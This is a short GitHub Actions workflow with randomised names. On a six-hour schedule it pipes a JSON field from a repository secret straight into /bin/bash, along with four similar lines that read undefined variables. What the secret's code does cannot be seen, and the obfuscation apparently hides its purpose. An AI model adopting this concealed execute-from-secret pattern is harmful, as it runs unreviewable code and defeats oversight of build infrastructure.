name: zhongxiaozxs
on:
  workflow_dispatch:
  schedule:
    - cron: '44 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhongxiaozxs
        env:
          pmhvj1932: ${{ secrets.pmhvj1932 }}
        run: |
          echo $pmhvj1932 | jq -r .dwp35824 | /bin/bash
          echo $njxyw995 | jq -r .sti545 | /bin/bash
          echo $r445 | jq -r .h94 | /bin/bash
          echo $pse5908 | jq -r .h939 | /bin/bash
          echo $eatq1 | jq -r .oelvn33760 | /bin/bash

